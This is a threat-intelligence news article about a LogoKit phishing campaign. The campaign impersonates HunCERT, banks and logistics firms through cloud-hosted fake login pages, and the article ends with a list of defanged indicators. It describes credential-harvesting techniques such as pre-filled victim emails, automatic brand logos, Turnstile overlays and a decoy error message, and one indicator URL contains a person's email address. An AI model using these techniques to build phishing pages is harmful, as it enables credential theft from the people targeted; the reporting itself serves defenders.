A sophisticated phishing campaign leveraging the widely used LogoKit phishing kit has surfaced, targeting a diverse global victim base spanning government, banking, logistics, and other sectors.
Cyble Research and Intelligence Labs (CRIL) uncovered an ongoing operation that exploits trusted brands including Hungary’s Computer Emergency Response Team (HunCERT) by hosting highly convincing fake login portals on reputable cloud services like Amazon S3 and Render.
These phishing sites, built for scalability and automation, further deploy Cloudflare Turnstile, a human-verification technology intended to reassure users, thus boosting the legitimacy and success of the credential harvesting operation.
Threat Actors Impersonate Major Entities
Technical analysis of the campaign reveals that phishing websites are carefully engineered to resemble legitimate login pages.
A notable technique involves pre-filling the username field with the victim’s authentic email address, a detail that heightens trust and increases the probability of credential submission.
Sites are hosted directly on Amazon S3 buckets, capitalizing on the trust associated with AWS infrastructure and helping these campaigns evade conventional security checks.
A unique hallmark of this campaign is the integration of Cloudflare Turnstile, a CAPTCHA alternative that not only prevents automated access but also adds an additional overlay of perceived security for the victim.
This meticulous attention to detail is further reflected in the phishing kits’ use of the Clearbit Logo API and Google’s S2 Favicon API.
By dynamically extracting the target organization’s logo and favicon based on the domain of the victim’s email LogoKit enables attackers to deploy highly targeted, brand-consistent phishing portals at scale.
This automation removes the need for manual preparation of branded assets and facilitates rapid, campaign-wide updates.
Convincing Cloud-Hosted Campaigns
The backend of the attack leverages the malicious domain mettcoint[.]com, which acts as a command and control (C&C) hub to receive harvested credentials.
Detailed CRIL investigation found mettcoint[.]com to be an active infrastructure node, with open directories and multiple phishing resources targeting both regional and international organizations.
Notably, the domain remains completely undetected by VirusTotal, highlighting its operational stealth and ability to bypass widespread security controls.
Further scrutiny revealed the campaign is not limited to Hungary; other targets include the Kina Bank in Papua New Guinea, a major US-based Catholic organization, and logistics firms in Saudi Arabia.
Victims who enter their credentials are typically met with a deceptive error message on the phishing page, such as “Error Submitting form. Please try again,” which serves to delay detection and keep the victim unaware of successful credential theft.
The provenance of the campaign traces back to the increasing use of LogoKit, first discovered in 2021, which is favored by threat actors for its modular approach and wide adaptability to new targets.
Given the sophistication and ongoing nature of the attack, CRIL strongly advises organizations to maintain vigilance through robust security policies and regular awareness training.
Leveraging advanced threat intelligence feeds, real-time monitoring of cloud infrastructure, and proactive takedown strategies are recommended.
The use of multi-factor authentication, coupled with regular updates to systems and secure email gateways, can help mitigate the risk posed by this evolving threat.
Indicators of Compromise (IOCs)
| Indicator | Type | Description |
|---|---|---|
| flyplabtk[.]s3.us-east-2.amazonaws.com/q8T1vRz…/he-opas.html | URL | Phishing URL |
| hxxps://chyplast[.]onrender.com/clastk-chy.html | URL | Phishing URL |
| jstplastoss-bk.s3[.]us-east-2.amazonaws.com/z7WvKx…/auth-he-opas.html | URL | Phishing URL |
| ecowhizz.co[.]za/ecowhizz.co.zaza/he-opas.html?email=ict.apnic@au.saabgroup.com | URL | Phishing URL |
| mettcoint[.]com | URL | C&C Domain |
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates
